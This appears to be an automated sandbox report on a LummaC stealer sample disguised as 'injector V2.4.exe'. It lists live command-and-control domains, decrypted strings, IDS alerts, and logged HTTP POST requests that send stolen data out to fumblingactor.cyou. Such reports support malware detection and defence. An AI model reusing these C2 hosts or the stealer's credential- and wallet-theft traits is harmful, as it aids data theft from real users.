Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
injector V2.4.exe

Overview

General Information

Sample name:injector V2.4.exe
Analysis ID:1560307
MD5:837840f37e344f8e7bc187f88f93c4a8
SHA1:782edf606d07812ec71254cc9cf2260da2e3fd51
SHA256:02ec8860240f90b920bb2692f651d0ec712e511e0bd17a3b1048382fdfdcb4d8
Tags:exeuser-4k95m
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • injector V2.4.exe (PID: 6348 cmdline: "C:\Users\user\Desktop\injector V2.4.exe" MD5: 837840F37E344F8E7BC187F88F93C4A8)
    • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • injector V2.4.exe (PID: 3720 cmdline: "C:\Users\user\Desktop\injector V2.4.exe" MD5: 837840F37E344F8E7BC187F88F93C4A8)
    • injector V2.4.exe (PID: 1492 cmdline: "C:\Users\user\Desktop\injector V2.4.exe" MD5: 837840F37E344F8E7BC187F88F93C4A8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["peepburry828.sbs", "3xp3cts1aim.sbs", "fumblingactor.cyou", "processhol.sbs", "p10tgrace.sbs", "p3ar11fter.sbs"]}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: injector V2.4.exe PID: 1492JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      Process Memory Space: injector V2.4.exe PID: 1492JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: injector V2.4.exe PID: 1492JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T16:51:59.946351+010020283713Unknown Traffic192.168.2.549710172.67.219.199443TCP
            2024-11-21T16:52:02.044217+010020283713Unknown Traffic192.168.2.549711172.67.219.199443TCP
            2024-11-21T16:52:04.519436+010020283713Unknown Traffic192.168.2.549712172.67.219.199443TCP
            2024-11-21T16:52:06.697059+010020283713Unknown Traffic192.168.2.549713172.67.219.199443TCP
            2024-11-21T16:52:09.534774+010020283713Unknown Traffic192.168.2.549714172.67.219.199443TCP
            2024-11-21T16:52:12.576375+010020283713Unknown Traffic192.168.2.549715172.67.219.199443TCP
            2024-11-21T16:52:14.933335+010020283713Unknown Traffic192.168.2.549716172.67.219.199443TCP
            2024-11-21T16:52:18.362746+010020283713Unknown Traffic192.168.2.549726172.67.219.199443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T16:52:00.661859+010020546531A Network Trojan was detected192.168.2.549710172.67.219.199443TCP
            2024-11-21T16:52:02.776657+010020546531A Network Trojan was detected192.168.2.549711172.67.219.199443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T16:52:00.661859+010020498361A Network Trojan was detected192.168.2.549710172.67.219.199443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T16:52:02.776657+010020498121A Network Trojan was detected192.168.2.549711172.67.219.199443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T16:52:13.294353+010020480941Malware Command and Control Activity Detected192.168.2.549715172.67.219.199443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T16:52:14.962103+010028438641A Network Trojan was detected192.168.2.549716172.67.219.199443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: injector V2.4.exeAvira: detected
            Source: https://fumblingactor.cyou:443/apiAvira URL Cloud: Label: malware
            Source: https://fumblingactor.cyou/apiAvira URL Cloud: Label: malware
            Source: https://fumblingactor.cyou/api;Avira URL Cloud: Label: malware
            Source: 00000000.00000002.2053404503.0000000000999000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["peepburry828.sbs", "3xp3cts1aim.sbs", "fumblingactor.cyou", "processhol.sbs", "p10tgrace.sbs", "p3ar11fter.sbs"]}
            Source: injector V2.4.exeReversingLabs: Detection: 34%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.7% probability
            Source: injector V2.4.exeJoe Sandbox ML: detected
            Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: p3ar11fter.sbs
            Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 3xp3cts1aim.sbs
            Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: peepburry828.sbs
            Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: p10tgrace.sbs
            Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: processhol.sbs
            Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fumblingactor.cyou
            Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4_2_0041941E CryptUnprotectData,4_2_0041941E
            Source: injector V2.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.199:443 -> 192.168.2.5:49716 version: TLS 1.2
            Source: injector V2.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B4F680 FindFirstFileExW,0_2_00B4F680
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 0_2_00B4F731 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00B4F731
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B4F680 FindFirstFileExW,3_2_00B4F680
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 3_2_00B4F731 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00B4F731
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 1B6183F2h4_2_0040DBCA
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+08h]4_2_004394C0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov ecx, eax4_2_0042E573
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+66h]4_2_0040CE25
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov byte ptr [edi], cl4_2_0042EED9
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov byte ptr [edx], al4_2_0042EED9
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00423050
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp al, 2Eh4_2_00429055
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov ecx, eax4_2_0041B87A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 933FB3DAh4_2_0041B87A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx eax, byte ptr [edx+ebx*2]4_2_0041D834
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 7D5D6260h4_2_0041C03D
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h4_2_0041C03D
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then lea ecx, dword ptr [eax+24h]4_2_0041B09F
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]4_2_0041E8A1
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h4_2_0041C951
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov edx, ecx4_2_0043A170
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then push eax4_2_0040A130
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h4_2_004241D0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx edi, byte ptr [edx]4_2_0042D9F4
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov ecx, eax4_2_0042E986
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h4_2_0042C9A0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax-01h]4_2_0042A24C
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov word ptr [ebp+edx*4+00h], ax4_2_00407A50
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]4_2_00407A50
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then lea ecx, dword ptr [eax+24h]4_2_0041CA5F
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx esi, byte ptr [ecx]4_2_00424A6F
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h4_2_0041CA0C
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx ebx, bx4_2_004272DE
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then lea ecx, dword ptr [eax+24h]4_2_0041B09F
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax-01h]4_2_0042A299
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov ecx, eax4_2_0040A35B
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then lea eax, dword ptr [ebx+ebx]4_2_0041DB1F
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then xor byte ptr [esp+eax+08h], al4_2_0041D3F0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042F39A
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov esi, edx4_2_0042BBA5
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then lea ecx, dword ptr [eax+24h]4_2_0041A45E
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov edx, eax4_2_0041EC60
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov edx, ecx4_2_00439C60
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+6AAA525Ah]4_2_0040D46E
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_0042C410
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov byte ptr [edi], bl4_2_00409430
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx ebx, bx4_2_004272DE
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-6868FAC4h]4_2_0042BDC6
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then push edi4_2_0041A643
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00427E47
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ebp+0Ch]4_2_004096C0
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov ebp, eax4_2_00405E90
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov ecx, eax4_2_0040AF50
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then mov ecx, edi4_2_00439F60
            Source: C:\Users\user\Desktop\injector V2.4.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_004367A0

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49711 -> 172.67.219.199:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49715 -> 172.67.219.199:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49711 -> 172.67.219.199:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49710 -> 172.67.219.199:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49710 -> 172.67.219.199:443
            Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49716 -> 172.67.219.199:443
            Source: Malware configuration extractorURLs: peepburry828.sbs
            Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
            Source: Malware configuration extractorURLs: fumblingactor.cyou
            Source: Malware configuration extractorURLs: processhol.sbs
            Source: Malware configuration extractorURLs: p10tgrace.sbs
            Source: Malware configuration extractorURLs: p3ar11fter.sbs
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 172.67.219.199:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49726 -> 172.67.219.199:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 172.67.219.199:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 172.67.219.199:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 172.67.219.199:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 172.67.219.199:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.219.199:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 172.67.219.199:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fumblingactor.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: fumblingactor.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J6HYNMF79F9LGP59V7AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12848Host: fumblingactor.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BUIRWLP4LYVPBVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15060Host: fumblingactor.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C1QY4W1ZKUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20526Host: fumblingactor.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U0YBS5GLCGU18GRPDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1266Host: fumblingactor.cyou
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OWS7AAIK91User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569214Host: fumblingactor.cyou
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: fumblingactor.cyou
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fumblingactor.cyou
            Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: injector V2.4.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: injector V2.4.exe, 00000004.00000003.2253728589.0000000000502000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254512158.0000000000502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: injector V2.4.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
            Source: injector V2.4.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
            Source: injector V2.4.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
            Source: injector V2.4.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
            Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: injector V2.4.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
            Source: injector V2.4.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
            Source: injector V2.4.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
            Source: injector V2.4.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
            Source: injector V2.4.exeString found in binary or memory: http://ocsp.comodoca.com0
            Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: injector V2.4.exeString found in binary or memory: http://ocsp.sectigo.com0
            Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: injector V2.4.exe, 00000004.00000003.2151366156.0000000004F6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: injector V2.4.exe, 00000004.00000003.2153081983.0000000004EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
            Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: injector V2.4.exe, 00000004.00000003.2153081983.0000000004EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
            Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: injector V2.4.exe, 00000004.00000003.2102000951.0000000004E9B000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102106308.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2102189028.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: injector V2.4.exe, injector V2.4.exe, 00000004.00000003.2122997963.0000000004EDA000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2122845833.0000000004EDA000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2241547764.0000000004EDC000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2123114421.0000000004EDB000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2182661370.000000000053A000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2254179791.0000000004EDC000.00000004.00000800.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fumblingactor.cyou/
            Source: injector V2.4.exe, 00000004.00000002.2254904675.0000000000540000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2219862338.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fumblingactor.cyou/#
